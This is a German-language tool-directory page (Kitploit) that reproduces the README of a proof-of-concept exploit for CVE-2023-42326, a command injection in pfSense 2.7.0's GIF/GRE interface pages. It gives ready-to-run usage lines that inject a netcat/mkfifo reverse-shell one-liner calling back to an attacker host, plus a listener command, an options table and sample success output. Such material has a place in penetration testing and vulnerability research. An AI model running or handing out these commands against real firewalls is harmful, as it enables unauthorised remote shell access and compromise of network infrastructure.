Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2023-42326 — Dies ist ein einfacher POC, der die pfsense 2.7 Command-Injection-Schwachstelle (CVE-2023-42326) zeigt. | Kitploit
Tools/GitHubGitHub/bl4ckarch/cve-2023-42326
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsCommand and Control
GitHubbl4ckarch/cve-2023-42326

CVE-2023-42326

Dies ist ein einfacher POC, der die pfsense 2.7 Command-Injection-Schwachstelle (CVE-2023-42326) zeigt.

Repository anzeigen
4vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

pfSense 2.7.0 Command Injection Exploit (CVE-2023-42326)

Dieses Python-Skript ist ein Proof-of-Concept-Exploit (PoC) für die Command-Injection-Schwachstelle (CVE-2023-42326) in pfSense 2.7.0. Die Schwachstelle erlaubt authentifizierten Angreifern, beliebige Befehle über die Komponenten interfaces_gif_edit.php und interfaces_gre_edit.php einzuschleusen und auszuführen.

Funktionen

  • Auswahl des Exploit-Modus (gif oder gre), um die verwundbaren Komponenten auszuwählen.
  • Command-Injection-Fähigkeit zur Ausführung beliebiger Shell-Befehle.
  • Netcat-Reverse-Shell-Handling mit automatischem Thread-Management.
  • Debug-Modus für bessere Sichtbarkeit der Request-Daten.

Voraussetzungen

Stelle vor der Ausführung des Skripts sicher, dass du Folgendes hast:

  • Python 3.x auf deinem System installiert.
  • Die erforderlichen Python-Bibliotheken installiert:
    root@kitploit:~
    pip install requests beautifulsoup4 rich
    

Verwendung

Einfaches Beispiel (Command Injection)

Dieser Befehl injiziert einen Shell-Befehl, der eine Reverse-Shell zu deinem Rechner aufbaut:

root@kitploit:~
python3 exploit.py -u "admin" -p "pfsense" --mode "gif" -t "http://10.101.1.1" -c "rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 192.168.151.1 80 > /tmp/f &"
  • -u: Benutzername für den pfSense-Admin-Login.
  • -p: Passwort für den pfSense-Admin-Login.
  • --mode: Exploit-Modus (entweder gif oder gre).
  • -t: Ziel-URL von pfSense.
  • -c: Der einzuschleusende Shell-Befehl.
  • -d: (Optional) Debug-Modus aktivieren, um die rohen Antwortdaten zu sehen.

Reverse-Shell-Beispiel

Stelle sicher, dass auf deinem Rechner ein Netcat-Listener läuft:

root@kitploit:~
nc -lvnp 80

Führe dann das Skript mit einem Reverse-Shell-Befehl wie folgt aus:

root@kitploit:~
python3 exploit.py -u "admin" -p "pfsense" --mode "gif" -t "http://10.101.1.1" -c "rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 192.168.151.1 80 > /tmp/f &"  --insecure(for https without valid ssl)

Demo-GIFs

  1. Anmelden an pfSense und Ausnutzen der GIF-Schnittstelle

    Demo 1 - GIF-Schnittstelle

  2. Ausführen einer Reverse-Shell

    Demo 2 - Reverse-Shell

Skriptoptionen

Beispielausgabe

Wenn der Exploit erfolgreich ausgeführt wird, solltest du eine Ausgabe ähnlich dieser sehen:

root@kitploit:~
██████╗ ███████╗██████╗ ██╗    ██╗███╗   ██╗███╗   ███╗███████╗
██╔══██╗██╔════╝██╔══██╗██║    ██║████╗  ██║████╗ ████║██╔════╝
██████╔╝█████╗  ██████╔╝██║ █╗ ██║██╔██╗ ██║██╔████╔██║█████╗  
██╔═══╝ ██╔══╝  ██╔═══╝ ██║███╗██║██║╚██╗██║██║╚██╔╝██║██╔══╝  
██║     ██║     ██║     ╚███╔███╔╝██║ ╚████║██║ ╚═╝ ██║███████╗
╚═╝     ╚═╝     ╚═╝      ╚══╝╚══╝ ╚═╝  ╚═══╝╚═╝     ╚═╝╚══════╝

Made with ❤️  by @bl4ckarch                                                            
[2024-10-24 03:57:59] [SUCCESS] Target http://10.101.1.1 is reachable
[2024-10-24 03:57:59] [INFO] Fetching CSRF token from: http://10.101.1.1/
[2024-10-24 03:57:59] [SUCCESS] CSRF token extracted successfully
[2024-10-24 03:57:59] [INFO] Sending GIF exploit request to http://10.101.1.1/interfaces_gif_edit.php
[2024-10-24 03:57:59] [SUCCESS] GIF Exploit sent successfully

Hinweise

  • Rechteanforderung: Du musst gültige Admin-Zugangsdaten für die pfSense-Instanz besitzen.
  • Zielsystem: Dieser Exploit ist spezifisch für pfSense 2.7.0.
  • Reverse-Shell: Stelle sicher, dass deine Firewall-Einstellungen eingehende Verbindungen auf dem angegebenen Port erlauben, wenn du eine Reverse-Shell einrichtest.

Debug-Modus

Wenn du weitere Details zu den gesendeten Requests sehen möchtest, kannst du den Debug-Modus aktivieren, indem du -d zu deinem Befehl hinzufügst. Dadurch werden Antwortdaten ausgegeben, was bei der Fehlersuche hilft.

root@kitploit:~
python3 exploit.py -u "admin" -p 'pfsense' --mode 'gif' -t http://10.101.1.1 -c "your_command_here" -d --insecure(for https without valid ssl)

Fehlerbehebung

  • Stelle sicher, dass das Zielsystem erreichbar ist.
  • Überprüfe die Zugangsdaten, die für den Login verwendet werden.
  • Verwende bei Bedarf das -d-Flag für eine detailliertere Protokollierung.
Tool herunterladen
ArgumentBeschreibung
-uBenutzername für den pfSense-Admin-Login.
-pPasswort für den pfSense-Admin-Login.
-tZiel-pfSense-URL/IP-Adresse (z. B. http://10.101.1.1).
--modeExploit-Modus: gif (für interfaces_gif_edit.php) oder gre.
-cBefehl, der in die verwundbare Komponente eingeschleust werden soll.
-dOptional. Debug-Modus aktivieren, um Antwortdaten zur Sichtbarkeit auszugeben.